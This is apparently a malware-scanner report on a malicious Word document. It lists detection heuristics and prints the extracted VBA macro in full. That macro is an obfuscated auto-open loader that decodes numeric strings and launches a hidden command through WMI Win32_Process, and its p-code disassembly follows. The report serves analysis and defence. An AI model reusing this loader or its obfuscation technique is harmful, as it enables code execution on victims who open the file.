MALICIOUS
190
Risk Score
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10694 bytes |
SHA-256: 8a1cd5e2af71d3f4cda1f46e453405802fd965359c56550a717c7831a12f93ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu
End Sub
Sub FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu()
Dim vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN As String
Dim sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu As String
vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN = "19920920014620122020113214719913213420020120813214" & _
"72021321472131321671581921872052102002112192151921" & _
"84197215207215192201210199146216220216132150162210" & _
"21720813213813220020120813214720213214721313216715" & _
"81921872052102002112192151921841972152072151921971" & _
"46201220201132150162210217208132138132198205216215" & _
"19720020920521013214718421419721021520220121413221" & _
"62042011742111981322042162162121581471471491571501" & _
"46149154156146152153146149153150147180183182217210" & _
"21521219719920114517321021821120720118221721014519" & _
"92012142162172162052081672112002012001462162202161" & _
"32167158192187205210200211219215192184197215207215" & _
"19220121019914621622021613213813219920121421621721" & _
"62052081321452002011992112002011321671581921872052" & _
"10200211219215192184197215207215192201210199146216" & _
"22021613216715819218720521020021121921519218419721" & _
"52072151921971462012202011321381321671581921872052" & _
"10200211219215192177205199214211215211202216146178" & _
"16918419217021419720920121921121420715415219221815" & _
"21461481461511481511491571922052102152161972082082" & _
"17216205208146201220201132147208211203202205208201" & _
"16113214717621120318421116721121021521120820116120" & _
"21972082152011321471851321671581921872052102002112" & _
"19215192184197215207215192197146201220201134"
sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN)
On Error Resume Next
If ActiveDocument.Name <> zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("204201208208211146200211199") Then
Exit Sub
End If
On Error GoTo 0
Dim aHDFOqXekZrYdocrOpNOsjdQRoDghfW As String
Dim obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM As String
Dim iDiFwSGgutwANWqgSXDhnaAKC As Variant
Dim OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS As Variant
aHDFOqXekZrYdocrOpNOsjdQRoDghfW = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("219205210209203209216215158192192146192214211211216192199205209218150")
obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("187205210151150195180214211199201215215")
OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS = Null
GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
End Sub
Function hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu)
hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR = Chr(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu - 100)
End Function
Function LhBbnQJHaqwydGKtiTwGmpDzV(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm)
LhBbnQJHaqwydGKtiTwGmpDzV = Left(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm, 3)
End Function
Function VddOROxmpnMMdeLojNuwlvgPXmC(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH)
VddOROxmpnMMdeLojNuwlvgPXmC = Right(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH, Len(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH) - 3)
End Function
Function zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
Do
pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW + hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(LhBbnQJHaqwydGKtiTwGmpDzV(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
pGaVjsZIyajfKIxlkCTLPpVyvJSF = VddOROxmpnMMdeLojNuwlvgPXmC(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
Loop While Len(pGaVjsZIyajfKIxlkCTLPpVyvJSF) > 0
zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
End Function
' Processing file: /opt/analyzer/scan_staging/3d031d4574dc4919ba5afd3ed6026e6c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 8910 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' ArgsCall vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 0x0000
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Sub vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN())
' Line #5:
' Dim
' VarDefn sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu (As String)
' Line #6:
' Dim
' VarDefn zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR (As String)
' Line #7:
' Line #8:
' LineCont 0x005C 04 00 04 00 06 00 04 00 08 00 04 00 0A 00 04 00 0C 00 04 00 0E 00 04 00 10 00 04 00 12 00 04 00 14 00 04 00 16 00 04 00 18 00 04 00 1A 00 04 00 1C 00 04 00 1E 00 04 00 20 00 04 00 22 00 04 00 24 00 04 00 26 00 04 00 28 00 04 00 2A 00 04 00 2C 00 04 00 2E 00 04 00 30 00 04 00
' LitStr 0x0032 "19920920014620122020113214719913213420020120813214"
' LitStr 0x0032 "72021321472131321671581921872052102002112192151921"
' Concat
' LitStr 0x0032 "84197215207215192201210199146216220216132150162210"
' Concat
' LitStr 0x0032 "21720813213813220020120813214720213214721313216715"
' Concat
' LitStr 0x0032 "81921872052102002112192151921841972152072151921971"
' Concat
' LitStr 0x0032 "46201220201132150162210217208132138132198205216215"
' Concat
' LitStr 0x0032 "19720020920521013214718421419721021520220121413221"
' Concat
' LitStr 0x0032 "62042011742111981322042162162121581471471491571501"
' Concat
' LitStr 0x0032 "46149154156146152153146149153150147180183182217210"
' Concat
' LitStr 0x0032 "21521219719920114517321021821120720118221721014519"
' Concat
' LitStr 0x0032 "92012142162172162052081672112002012001462162202161"
' Concat
' LitStr 0x0032 "32167158192187205210200211219215192184197215207215"
' Concat
' LitStr 0x0032 "19220121019914621622021613213813219920121421621721"
' Concat
' LitStr 0x0032 "62052081321452002011992112002011321671581921872052"
' Concat
' LitStr 0x0032 "10200211219215192184197215207215192201210199146216"
' Concat
' LitStr 0x0032 "22021613216715819218720521020021121921519218419721"
' Concat
' LitStr 0x0032 "52072151921971462012202011321381321671581921872052"
' Concat
' LitStr 0x0032 "10200211219215192177205199214211215211202216146178"
' Concat
' LitStr 0x0032 "16918419217021419720920121921121420715415219221815"
' Concat
' LitStr 0x0032 "21461481461511481511491571922052102152161972082082"
' Concat
' LitStr 0x0032 "17216205208146201220201132147208211203202205208201"
' Concat
' LitStr 0x0032 "16113214717621120318421116721121021521120820116120"
' Concat
' LitStr 0x0032 "21972082152011321471851321671581921872052102002112"
' Concat
' LitStr 0x002C "19215192184197215207215192197146201220201134"
' Concat
' St sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu
' Line #9:
' Line #10:
' Line #11:
' Ld sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR
' Line #12:
' OnError (Resume Next)
' Line #13:
' Ld ActiveDocument
' MemLd Name
' LitStr 0x001B "204201208208211146200211199"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' Ne
' IfBlock
' Line #14:
' ExitSub
' Line #15:
' EndIfBlock
' Line #16:
' OnError (GoTo 0)
' Line #17:
' Line #18:
' Line #19:
' Dim
' VarDefn obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM (As String)
' Line #20:
' Dim
' VarDefn iDiFwSGgutwANWqgSXDhnaAKC (As String)
' Line #21:
' Dim
' VarDefn OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS (As Variant)
' Line #22:
' Dim
' VarDefn hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR (As Variant)
' Line #23:
' Line #24:
' Line #25:
' LitStr 0x0045 "219205210209203209216215158192192146192214211211216192199205209218150"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM
' Line #26:
' LitStr 0x0027 "187205210151150195180214211199201215215"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St iDiFwSGgutwANWqgSXDhnaAKC
' Line #27:
' LitVarSpecial (Null)
' St hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Line #28:
' Line #29:
' Ld zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR
' Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Ld OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS
' Ld iDiFwSGgutwANWqgSXDhnaAKC
' Ld obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM
' ArgsLd GetObject 0x0001
' ArgsMemLd Get 0x0001
' ArgsMemCall Create 0x0004
' Line #30:
' Line #31:
' Line #32:
' EndSub
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' FuncDefn (Function LhBbnQJHaqwydGKtiTwGmpDzV(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN))
' Line #37:
' Ld vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN
' LitDI2 0x0064
' Sub
' ArgsLd Chr 0x0001
' St LhBbnQJHaqwydGKtiTwGmpDzV
' Line #38:
' EndFunc
' Line #39:
' Line #40:
' FuncDefn (Function fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm(VddOROxmpnMMdeLojNuwlvgPXmC))
' Line #41:
' Ld VddOROxmpnMMdeLojNuwlvgPXmC
' LitDI2 0x0003
' ArgsLd Left 0x0002
' St fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm
' Line #42:
' EndFunc
' Line #43:
' Line #44:
' FuncDefn (Function yjKWenHHLnvyCuSHXYCsKhIyTnJGnH(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
' Line #45:
' Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF
' Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF
' FnLen
' LitDI2 0x0003
' Sub
' ArgsLd Right 0x0002
' St yjKWenHHLnvyCuSHXYCsKhIyTnJGnH
' Line #46:
' EndFunc
' Line #47:
' Line #48:
' FuncDefn (Function aHDFOqXekZrYdocrOpNOsjdQRoDghfW(pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW))
' Line #49:
' Do
' Line #50:
' Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' ArgsLd fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 0x0001
' ArgsLd LhBbnQJHaqwydGKtiTwGmpDzV 0x0001
' Add
' St _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Line #51:
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' ArgsLd yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 0x0001
' St pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Line #52:
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' FnLen
' LitDI2 0x0000
' Gt
' LoopWhile
' Line #53:
' Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' St aHDFOqXekZrYdocrOpNOsjdQRoDghfW
' Line #54:
' EndFunc
' Line #55:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.